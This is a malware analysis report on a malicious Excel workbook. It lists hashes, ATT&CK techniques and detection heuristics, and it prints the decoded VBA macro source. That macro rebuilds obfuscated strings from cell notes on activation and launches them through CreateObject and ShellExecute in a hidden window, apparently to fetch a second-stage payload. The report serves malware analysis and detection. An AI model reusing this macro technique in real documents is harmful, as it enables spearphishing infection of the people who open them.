Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c756a5fe7968fef…

MALICIOUS

Office (OLE)

Size: 85.0 KB
Created: 2015-06-05 18:17:20
Authoring application: Microsoft Excel
First seen: 2021-07-10
MD5: 2ea2e6592564f71211f41a904062c79d
SHA-1: 11c27f823def027129300d7515b3cbc6a64516d4
SHA-256: 3c756a5fe7968fef163f917c6b9aff383dc5ace3155db7d69324ba931446e1d5
Risk Score: 100

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Excel workbook containing VBA macros. At run time the macros assemble a string, pass it to CreateObject to obtain a COM object, and invoke that object's ShellExecute method, most likely to download and execute a second-stage payload. The exact URL or command is obfuscated, but the intent is to launch an external process. Using VBA to run arbitrary commands in this way is a common initial-access technique delivered via spearphishing attachments.

Heuristics (3)

  • Reference to ShellExecute API (severity: high, rule SC_STR_SHELLEXEC)
    Reference to ShellExecute API
  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched lines in script:
      Set giwHaVz = CreateObject(t7)
      giwHaVz.ShellExecute "P" + n1, A2, "", "", 0

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1532 bytes
SHA-256: 37f1a43fb8aca0b238378d44f55449c94026b4e6d27e3f75d89ccef7802be127

Extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
Dim qoSx, ykJLZ, Jcplbdm, KxOG

Set KxOG = Worksheets("Sheet1")

  qoSx = KxOG.Range("D500").NoteText + KxOG.Range("D501").NoteText + KxOG.Range("D502").NoteText + KxOG.Range("D503").NoteText + KxOG.Range("D504").NoteText + KxOG.Range("D505").NoteText + KxOG.Range("D506").NoteText + KxOG.Range("D507").NoteText
 
 t8hg0 = KxOG.Range("D508").NoteText
 y70fdsd = KxOG.Range("D509").NoteText

  Jcplbd = LOL.HjDih(Umimhmj(qoSx), t8hg0, y70fdsd)


End Sub
  


Function Umimhmj(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Umimhmj = StrNew
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "LOL"

Function HjDih(A2, n1, t7)
Dim giwHaVz

Set giwHaVz = CreateObject(t7)
giwHaVz.ShellExecute "P" + n1, A2, "", "", 0



End Function